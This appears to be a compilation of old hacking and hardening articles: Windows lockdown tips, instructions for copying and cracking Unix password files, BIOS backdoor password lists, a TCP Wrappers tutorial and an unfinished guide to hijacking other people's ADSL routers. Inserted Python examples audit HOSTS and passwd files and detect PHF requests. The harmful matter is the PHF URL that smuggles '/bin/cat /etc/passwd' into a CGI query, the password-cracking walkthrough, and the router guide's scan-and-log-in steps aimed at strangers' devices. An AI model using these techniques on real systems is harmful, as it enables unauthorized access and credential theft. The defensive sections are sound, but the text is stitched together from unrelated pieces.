2. Disable the POSIX and OS/2 Subsystems: Windows 2000 and XP come with little-documented subsystems that allow compatibility with UNIX and OS/2 systems. These subsystems are enabled by default but so rarely used that they are best off being disabled completely to prevent possible service hijackings. To disable these subsystems, open the registry and navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems. Delete the subkeys Os2 and Posix, then reboot.

3. Never leave default passwords blank: On installation, Windows 2000 sets up an Administrator account with total system access and prompts for a password. Guess what: by default, it allows that password to be blank. If a user doesn't want to type a password, he can simply click Next and the system will be an open door for anyone who wants to log on. Always opt for a password of some kind when setting up the default account on a machine.

4. Install Windows in a different directory: Windows usually installs itself in the WINDOWS directory. Windows NT 4.0 and 2000 will opt for WINNT. Many worms and other rogue programs assume this to be the case and attempt to exploit the files in those folders. To defeat this, install Windows to another directory when you're setting it up; you can specify the name of the directory during setup. WINDIR is okay; some people use WNDWS. A few (not that many) programs may not install properly if you install Windows to another folder, but they are very few and far between.

5. Fake out hackers with a dummy Administrator account: Since the default account in Windows 2000 is always named Administrator, an enterprising hacker can try to break into your system by attempting to guess the password on that account. If you never bothered to put a password on that account, say your prayers. Rather than be a sucker to a hacker, put a password on the Administrator account if you haven't done so already. Then change the name of the Administrator account. You'll still be able to use the account under its new name, since Windows identifies user accounts by a back-end ID number rather than the name. Finally, create a new account named Administrator and disable it. This should frustrate any would-be break-ins. You can add new accounts and change the names of existing accounts in Windows 2000 through the Local Users and Groups snap-in. Right-click on My Computer, select Manage, open the Local Users and Groups subtree, look in the Users folder and right-click on any name to rename it. To add a new user, right-click on the containing folder and select New User. Finally, to disable an account, double-click it, check the "Account is disabled" box and click OK. Don't ever delete the original Administrator account. Some programs refuse to install without it and you might have to log in under that account at some point to set up such software. The original Administrator account is configured with a security ID that must continue to be present in the system.

6. Disable the Guest account: Windows XP comes with a Guest account that's used for limited access, but it's still possible to do some damage with it. Disable it completely if you are not using it. Under Control Panel, select User Accounts, click on Guest Account and then select Turn Off the Guest Account.

7. Set the Hosts file to read-only to prevent name hijacking: This one's from (and to a degree, for) the experts. The HOSTS file is a text file that all flavors of Windows use to hold certain network addresses that never change. When a network name and address is placed in HOSTS, the computer uses the address listed there for that network name rather than performing a lookup (which can take time). Experts edit this file to place their most commonly visited sites into it, speeding things up considerably. Unfortunately, hijackers and hackers also love to put their own information into it, redirecting people from their favorite sites to places they don't want to go. One of the most common entries in HOSTS is localhost, which is set to 127.0.0.1. This refers to the local machine, and if this entry is damaged the computer can behave very unpredictably. To prevent HOSTS from being hijacked, set it to read-only. Go to the folder %SystemRoot%\system32\drivers\etc, right-click on HOSTS, select Properties, check the Read-Only box and click OK. If you want to add your own entries to HOSTS, you can unprotect it before doing so, but always remember to set it to read-only after you're done.

8. Disallow changes to IE settings through IE: This is another anti-hijacker tip. IE can be set so that any changes to its settings must be performed through the Internet icon in the Control Panel, rather than through IE's own interface. Some particularly unscrupulous programs or sites try to tamper with settings by accessing the Tools, Options menu in IE. You can disable this and still make changes to IE's settings through the Control Panel. Open the Registry and browse to HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions. Create or edit a DWORD value named NoBrowserOptions and set it to 1 (this is a per-user setting). Some third-party programs such as Spybot Search And Destroy allow you to toggle this setting. You can also keep IE from having other programs rename its default startup page, another particularly annoying form of hijacking. Browse to HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel and add or edit a DWORD named HomePage and set it to 1.

9. Turn off unneeded services: Windows 2000 and XP both come with many background services that don't need to be running most of the time: Alerter, Messenger, Server (if you're running a standalone machine with no file or printer shares), NetMeeting Remote Desktop Sharing, Remote Desktop Help Session Manager (the last two if you're not using Remote Desktop or NetMeeting), Remote Registry, Routing and Remote Access (if you're not using Remote Access), SSDP Discovery Service, Telnet, and Universal Plug and Play Device Host. For a good resource and instructions on which of these services can be disabled, go to http://www.blkviper.com/WinXP/

10. Disable Simple File Sharing: In Windows XP Professional, the Simple File Sharing mode is easily exploited, since it's a little too easy to share out a file across your LAN (or the Net at large). To turn it off, go to My Computer, click Tools, Folder Options and the View tab, and uncheck "Use simple file sharing (Recommended)". Click OK. When you do this you can access the Security tab in the Properties window for all folders, set permissions for folders, and take ownership of objects (but not in XP Home).
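Tip 7 above warns that a hijacked HOSTS file silently redirects names, and that a damaged localhost entry makes the machine misbehave. Setting the file read-only stops casual tampering, but a defender also wants to know whether it has already been altered. The block below is an added example written for this article (not from its author) that audits HOSTS content for the three things the tip describes: a localhost line that no longer points at a loopback address, names blackholed to 0.0.0.0, and names pinned to an address outside the loopback and private ranges. It works on a constructed sample embedded in the block; on a real Windows machine you would read %SystemRoot%\system32\drivers\etc\hosts (the path the tip gives) and pass its text to audit_hosts(). The address policy, sample lines and function names are this example's own assumptions.

```python
"""Added example (not from the article): audit a HOSTS file for hijacking."""
import ipaddress

# Address ranges that a HOSTS entry on a workstation normally points into.
# Anything else is worth a look; 0.0.0.0 is the classic "blackhole" trick.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fe80::/10")]

# Constructed HOSTS content: two good localhost lines, a LAN printer, a
# damaged localhost line, a real-site redirection and a blackholed updater.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
192.168.1.10    printer.lan
12.7.0.1        localhost                  # damaged entry
203.0.113.77    www.bank.example           # sends a real site elsewhere
0.0.0.0         update.antivirus.example   # blackholes an updater
"""


def parse_hosts(text):
    """Return [(address, [names...]), ...] for every non-comment line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        entries.append((fields[0], fields[1:]))
    return entries


def is_local(ip):
    """True when the address lies in one of LOCAL_NETS (same IP version)."""
    return any(ip in net for net in LOCAL_NETS)


def audit_hosts(text):
    """Return a list of (severity, message) findings, in file order."""
    findings = []
    for addr, names in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            # e.g. "1770.0.1": not an address at all, the entry is broken
            findings.append(("high", f"unparseable address {addr!r} for {names}"))
            continue
        for name in names:
            if name.lower() == "localhost" and not ip.is_loopback:
                findings.append(("high", f"localhost mapped to {addr}"))
            elif ip.is_unspecified:
                findings.append(("medium", f"{name} blackholed to {addr}"))
            elif not is_local(ip):
                findings.append(("medium", f"{name} pinned to non-local address {addr}"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_hosts(SAMPLE_HOSTS):
        print(f"[{severity}] {message}")
```

On the sample the audit reports the damaged localhost line as high severity and the two redirections as medium; the two correct localhost lines and the LAN printer produce nothing. Pair the audit with the read-only attribute from the tip: the attribute prevents the next change, the audit catches the one that already happened.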

Getting a Password File through FTP

Well, one of the easiest ways of getting superuser access is through anonymous FTP access into a webpage. First you need to learn a little about the password file.

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The superuser is the part that gives you root; that's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little difference: it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker (both explained later in the text). Below is another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password, or sometimes they are disguised with an * as well. Now that you know a little more about what the actual password file looks like, you should be able to tell a normal encrypted password file from a shadowed password file. We can now go on to talk about how to crack it. Cracking a password file isn't as complicated as it would seem, although the files vary from system to system.

1. The first step that you would take is to download or copy the file.

2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker, there are a few OK ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking program you will be asked to find the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose (ASCII, caps, lowercase, and numeric characters may also be added).

3. You then start up the cracker and follow the directions that it gives you.

The PHF Technique: Well, I wasn't sure if I should include this section, due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But still I thought that you should know about it, so I decided to include it. The PHF technique is by far the easiest way of getting a password file (although it doesn't work 95% of the time). To do the PHF, all you do is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace webpage_goes_here with the domain. So if you were trying to get the password file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file (if it works).
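Seen from the administrator's side, the two things this article relies on are both visible and both fixable: a password file that still carries hashes in its world-readable second field, and a CGI request whose query string smuggles a newline (%0a) in front of a shell command. The block below is an added example written for this article, not part of the original text or of any of the tools it names. audit_passwd() reads passwd-format lines in the style of the samples above and reports entries whose hash is still exposed (not shadowed), entries with an empty password field, and any second UID 0 account; detect_phf() scans Common Log Format lines for requests to /cgi-bin/phf whose decoded query contains a newline, which is the pattern shown above and is something an ordinary form lookup never produces. Both inputs are constructed for the example and the function names are this example's own.

```python
"""Added example (not from the article): passwd hygiene audit and PHF-style
request detection over constructed sample data."""
import re
from urllib.parse import unquote

# Constructed passwd lines in the style of the article's samples: two entries
# keep their hash in the file, one is an extra UID 0 account, one has no
# password at all, the rest are properly shadowed ("x") or locked ("*").
SAMPLE_PASSWD = """\
root:x:0:1:Superuser:/:/bin/sh
daemon:x:1:1:0000-Admin(0000):/:
tomjones:p5Y(h0tiC:1229:20:Tom Jones:/usr/people/tomjones:/bin/csh
bbob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
toor:*:0:0:second root:/:/bin/sh
guest::500:500:no password at all:/home/guest:/bin/sh
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
"""


def audit_passwd(text):
    """Return [(user, issue), ...] for a passwd-format file, in file order."""
    issues = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            issues.append((line, "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            issues.append((user, "empty password field"))
        elif pw != "x" and pw[0] not in "*!":
            # "x" means the hash lives in /etc/shadow; "*" and "!..." mean
            # the account is locked. Anything else is a hash in the clear.
            issues.append((user, "hash exposed in passwd (not shadowed)"))
        if uid == "0" and user != "root":
            issues.append((user, "extra UID 0 account"))
    return issues


# Constructed Common Log Format lines. The second is a legitimate phf lookup;
# the third and fourth carry a newline in the query, as in the URL above.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2011:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 512
10.0.0.5 - - [12/Nov/2011:10:01:03 +0000] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 88
10.0.0.9 - - [12/Nov/2011:10:01:09 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1220
10.0.0.9 - - [12/Nov/2011:10:01:10 +0000] "GET /cgi-bin/phf?Qalias=x%0A/bin/ls HTTP/1.0" 404 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) ')


def detect_phf(text):
    """Return [(client_ip, decoded_query), ...] for requests to /cgi-bin/phf
    whose percent-decoded query contains a newline or carriage return."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        if not path.endswith("/cgi-bin/phf"):
            continue
        decoded = unquote(query)
        if "\n" in decoded or "\r" in decoded:
            hits.append((line.split()[0], decoded))
    return hits


if __name__ == "__main__":
    for user, issue in audit_passwd(SAMPLE_PASSWD):
        print(f"passwd: {user}: {issue}")
    for client, query in detect_phf(SAMPLE_LOG):
        print(f"log: {client} sent {query!r}")
```

The decode-then-inspect order in detect_phf() is the important design choice: matching on the literal text "%0a" would miss the upper-case "%0A" variant in the fourth sample line, whereas the decoded query exposes the newline in both. The same reasoning applies to the passwd audit, which judges the second field by what it contains rather than by the user name, so a hash left behind for a service account is reported just like one for a person.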
Bypass BIOS Passwords
DISCLAIMER : This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used either to prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered by the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS.

Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer's support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

- Using a manufacturer's backdoor password to access the BIOS
- Using password cracking software
- Resetting the CMOS using the jumpers or solder beads
- Removing the CMOS battery for at least 10 minutes
- Overloading the keyboard buffer
- Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exceptions to this are laptops, especially IBM ThinkPads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the hard drive password as well, you will be unable to access the data on the drive.

Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated with "_" on the US keyboard corresponds to "?" on some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name-brand laptops. WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturer's documentation for the BIOS setting before you begin typing in passwords.

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222 589589 589721 595595 598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

Misc. common passwords:

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

Other BIOS passwords by manufacturer:

Manufacturer     Password
VOBIS & IBM      merlin
Dell             Dell
Biostar          Biostar
Compaq           Compaq
Enox             xo11nE
Epox             central
Freetech         Posterie
Iwill            iwill
Jetway           spooml
Packard Bell     bell9
QDI              QDI
Siemens          SKY_FOX
TMC              BIGO
Toshiba          Toshiba

Toshiba BIOS: Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot.

IBM Aptiva BIOS: Press both mouse buttons repeatedly during the boot.

Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk. Cmos password recovery tools 3.1, !BIOS (get the how-to article), RemPass, KILLCMOS.

Using the Motherboard "Clear CMOS" Jumper or Dipswitch Settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings, including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer, and ideally you should always refer to the motherboard or computer manufacturer's documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop. Please remember to unplug your PC and use a grounding strap before reaching into your PC and touching the motherboard. Once you locate and reset the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to their original position.


Removing the CMOS Battery


The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard (it looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank (along with any other machine-specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this). Some manufacturers back up the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard, making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time. Note: Removing the battery to reset the CMOS will not work for all PCs, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM ThinkPad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM ThinkPads have special jumper switches on the motherboard, and these should be used to reset the system.

Overloading the Keyboard Buffer


On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse detached from the system, or on some systems by hitting the ESC key over 100 times in rapid succession.

Jumping the Solder Beads on the CMOS


It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should only be used as a "last ditch" effort.

Using a professional service


If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Many corporations offer a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.


TCP Wrappers
If you are running a Linux box and connect to the net through it, there is every chance of someone else using or misusing the services running on your system. If someone gets to know your IP, it gives an attacker the opportunity to use the services or daemons running on the various ports of your system for malicious purposes. It has therefore become very important to define an access list which controls who can access which services on your system and who should be denied access to any of them. This is where TCP Wrappers are efficient yet easy to use.

So what exactly are TCP Wrappers? TCP Wrappers are tools which allow us to define a set of rules called access control rules. These rules define which hosts are allowed to access the services running on the local machine (where the TCP Wrappers are installed and configured) and which hosts are denied access to those services. So they are, in fact, somewhat (though only remotely) like firewalls: they check who has requested the connection, and if the requestor is in the deny list, he is not allowed to open a connection. Besides controlling access to the services on your system, TCP Wrappers also allow you to log who is using which service, at what time and even for what purpose. The best thing about TCP Wrappers is that they can also be used to set booby traps to catch lamers. Now, the above can be arranged as below:

Before we go on, we need a basic understanding of how Linux responds to a connection request. The thing to remember is that all connection requests received by a Linux box are handed to the Internet Daemon, 'inetd'.

The 'inetd' is the main daemon on a Linux machine; it receives connection requests on behalf of all the services or daemons listening on the various port numbers. Once 'inetd' receives a connection request, it uses two configuration files to determine what to do next:
1. /etc/services
2. /etc/inetd.conf
The first, /etc/services, contains the names of the various services and the port numbers on which they run; 'inetd' uses it to find out which service runs on a particular port. The second, /etc/inetd.conf, contains the names of the services and the corresponding daemons or programs that provide them; 'inetd' uses it to find out which daemon to call when a connection to a particular service is requested. The two files work together and are interlinked. To understand, with a real-life example, how 'inetd' uses these two files to let a remote connection take place, read the paragraph below.

Assume the server is Y and the client (connection requestor) is X. X sends Y a packet containing the port number to which it wants to connect (in this case 23, the Telnet port) and the other information needed to start a TCP connection. At Y, the 'inetd' daemon responds to the request and looks up /etc/services for the name of the service running on port 23 (the port number mentioned in the packet sent by X). /etc/services tells 'inetd' that the service on port 23 is Telnet. 'inetd' then consults /etc/inetd.conf for the name of the daemon which runs the Telnet service, and /etc/inetd.conf replies that it is a daemon called in.telnetd. 'inetd' then runs in.telnetd; with that its job is over and it goes back to listening for other connection requests.

So a remote system does not start out by talking directly to the various daemons; in the beginning it communicates only with 'inetd'. Now, if we want to stop particular hosts from accessing our system and allow only a predefined set of hosts in, what do we do? This is where TCP Wrappers come to the rescue. A TCP Wrapper is a daemon which sits between the main daemon of the Linux system, 'inetd', and the other daemons such as in.ftpd, in.telnetd and so on. As all connections to the Linux box pass through inetd, they will also pass through the TCP Wrapper. Thus, if certain rules are defined for the TCP Wrappers, they can indeed be used to enforce access control.

NOTE: Normally, inetd is configured to call the concerned daemons (telnetd etc.) directly. Once TCP Wrappers are installed, inetd is configured to call the Wrapper instead of the concerned daemon.

Once inetd calls the TCP Wrapper, i.e. hands it the packet it received, the wrapper reads the source IP from the packet and accordingly allows or denies the connection. Irrespective of whether the connection is allowed or denied, the wrapper writes an entry to the system log file.

NOTE: I am assuming that you have been able to install the TCP Wrapper daemon, i.e. /usr/sbin/tcpd. For more information on how to install it, read the Linux documentation, help or man pages, or visit www.linuxdoc.com, www.linux.com or www.newbielinux.com.

Now, how does the TCP Wrapper daemon, /usr/sbin/tcpd, decide whether to allow access to a particular host or not? The Wrapper is helped in this by two files:
1. /etc/hosts.allow
2. /etc/hosts.deny

As soon as inetd sends the connection request to the Wrapper, tcpd scans /etc/hosts.allow for a match for the hostname of the connection requestor. If a match is found, the connection is opened. If no match is found, it searches /etc/hosts.deny for a match. If even then no match is found, or if both files are empty, the connection is allowed to be opened.

NOTE: By default both files are empty, allowing everyone to open connections.

Now that we know how tcpd works, let us move on to how to configure it. The important thing to remember while configuring tcpd is what level of security you really want your system to have. Whatever kind of setup you may have, you are basically left with two options:

1. The Not So Secure but Service Providing System: most services are open and most people are allowed access. This is the best option if your system is a server providing services like mail, FTP and Telnet to a number of legitimate users. This way you can provide services to legitimate users and still ensure that unwanted hosts or clients do not get access to the services your server offers.

2. The Secure But No Service Providing System: this is typically meant for those of you who are very security conscious and whose system is not providing services to legitimate users. It ensures that no one misuses your system.

The Not So Secure But Service Providing System

In this case, as we allow access to most services, the /etc/hosts.allow list is practically empty, while /etc/hosts.deny contains the rules which govern which hosts are disallowed access. Let us take a typical /etc/hosts.deny rule as an example to understand how rules work. The following hosts.deny entry denies the Telnet and FTP services to anyone coming from abc.isp.com and to anyone coming from the domain isp.net:

in.telnetd in.ftpd : abc.isp.com .isp.net

Note: The '.' preceding isp.net tells tcpd to disallow access to the FTP and Telnet daemons to anyone coming from a system in the isp.net domain.

If you want to deny access to all services, the above changes to:

ALL : abc.isp.com .isp.net

Above, the ALL wildcard was used to restrict access to all services. Like ALL, there are a number of similar wildcards which can be used for access control. Some common ones are:

LOCAL: matches hostnames coming from the local domain.
UNKNOWN: matches hosts which cannot be resolved by DNS.
KNOWN: matches hosts which are resolved by DNS.
PARANOID: matches hosts whose name does not match their IP.

HACKING TRUTH: To allow access to all services to systems within your local domain, enter the following line in /etc/hosts.allow:

ALL : LOCAL

The Secure But No Service Providing System

The thing to remember here is that the hosts.allow file is checked first and then hosts.deny, and access is allowed only if no match is found in hosts.deny. To disallow all services to all hosts, enter the following line in hosts.deny:

ALL : ALL

The hosts.allow file should then contain the service name and the hosts to which access should be allowed. We would certainly like to be able to access all services running on our own machine from our own machine, so in hosts.allow enter the line:

ALL : localhost

Now, say you want to be able to access the FTP daemon from abc.com; then enter the following line:

in.ftpd : abc.com

But say you want to disallow hosts coming from the isp.net domain, and allow all other hosts to access the Telnet daemon; then enter the following line:

in.telnetd : ALL EXCEPT .isp.net
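To see the lookup order and wildcards described above in action, here is an added model, written for this article and not taken from the tcp_wrappers source, that evaluates the two hosts.allow/hosts.deny setups for a few constructed clients; the Client records stand in for tcpd's DNS lookups.

```python
# Added model of tcpd's hosts.allow / hosts.deny lookup, written for this article;
# it is not the tcp_wrappers source. Client records are constructed sample data
# standing in for tcpd's reverse and forward DNS lookups.
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass
class Client:
    ip: str
    name: Optional[str]            # None when reverse DNS fails (UNKNOWN)
    name_matches_ip: bool = True   # False when the forward lookup disagrees (PARANOID)


Rule = Tuple[List[str], List[str]]  # (daemon_list, client_list)


def parse_rules(text: str) -> List[Rule]:
    """Parse 'daemon_list : client_list' lines; blank lines and # comments are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            daemons, _, clients = line.partition(":")
            rules.append((daemons.replace(",", " ").split(),
                          clients.replace(",", " ").split()))
    return rules


def _match_list(tokens: List[str], match_one: Callable[[str], bool]) -> bool:
    """'list_1 EXCEPT list_2' matches whatever list_1 matches unless list_2 also matches."""
    if "EXCEPT" in tokens:
        i = tokens.index("EXCEPT")
        return _match_list(tokens[:i], match_one) and not _match_list(tokens[i + 1:], match_one)
    return any(match_one(t) for t in tokens)


def _client_token(token: str, c: Client) -> bool:
    """Match one client_list pattern against the connecting host."""
    if token == "ALL":
        return True
    if token == "UNKNOWN":
        return c.name is None
    if token == "KNOWN":
        return c.name is not None and c.name_matches_ip
    if token == "PARANOID":
        return c.name is not None and not c.name_matches_ip
    if token == "LOCAL":               # tcpd: any host name without a dot
        return c.name is not None and "." not in c.name
    if token.startswith("."):          # ".isp.net" matches every host in that domain
        return c.name is not None and c.name.lower().endswith(token.lower())
    return token == c.ip or (c.name is not None and token.lower() == c.name.lower())


def _matches(rules: List[Rule], service: str, c: Client) -> bool:
    return any(_match_list(d, lambda t: t in ("ALL", service))
               and _match_list(cl, lambda t: _client_token(t, c))
               for d, cl in rules)


def tcpd_decision(service: str, c: Client, hosts_allow: str, hosts_deny: str) -> str:
    """Return 'allow' or 'deny' in tcpd's order: hosts.allow, then hosts.deny, else allow."""
    if _matches(parse_rules(hosts_allow), service, c):
        return "allow"                 # a hosts.allow match ends the search
    if _matches(parse_rules(hosts_deny), service, c):
        return "deny"
    return "allow"                     # no match in either file (both are empty by default)


def log_line(service: str, c: Client, verdict: str) -> str:
    """Roughly the syslog entry tcpd writes for every connection, allowed or refused."""
    action = "connect" if verdict == "allow" else "refused connect"
    return "%s: %s from %s [%s]" % (service, action, c.name or "unknown", c.ip)


# The two setups from the article.
SERVICE_PROVIDING_ALLOW = ""           # hosts.allow is practically empty
SERVICE_PROVIDING_DENY = "in.telnetd in.ftpd : abc.isp.com .isp.net\n"
LOCKED_DOWN_ALLOW = "ALL : localhost\nin.ftpd : abc.com\nin.telnetd : ALL EXCEPT .isp.net\n"
LOCKED_DOWN_DENY = "ALL : ALL\n"


def demo() -> List[str]:
    """Push a few constructed clients through both setups; return the log lines."""
    clients = [Client("203.0.113.7", "abc.isp.com"), Client("203.0.113.8", "dsl8.isp.net"),
               Client("127.0.0.1", "localhost"), Client("198.51.100.2", "abc.com"),
               Client("198.51.100.9", None)]          # last one: reverse DNS failed
    lines = []
    for c in clients:
        for svc in ("in.telnetd", "in.ftpd"):
            for label, allow, deny in (("service-providing", SERVICE_PROVIDING_ALLOW, SERVICE_PROVIDING_DENY),
                                       ("locked-down", LOCKED_DOWN_ALLOW, LOCKED_DOWN_DENY)):
                lines.append(label + " " + log_line(svc, c, tcpd_decision(svc, c, allow, deny)))
    return lines
```

Run demo() to see the twenty log lines; note that the client whose reverse DNS failed slips through "ALL EXCEPT .isp.net", which is why name-based exceptions are weaker than address-based ones.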
How to Hack an Ethernet ADSL Router

Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet; however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.

Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the default username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service Provider and hence the users do not bother to change the password later. This makes it possible for attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.

Before you proceed, you need the following tool in the process: Angry IP Scanner. Here is detailed information on how to exploit the vulnerability of an ADSL router.

Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.

Step-2: Open Angry IP Scanner; here you will see an option called IP Range: where you need to enter the range of IP addresses to scan. Suppose your IP is 117.192.195.101, you can set the range to something like 117.192.194.0 to 117.192.200.255 so that there are at least 200-300 IP addresses in the range.

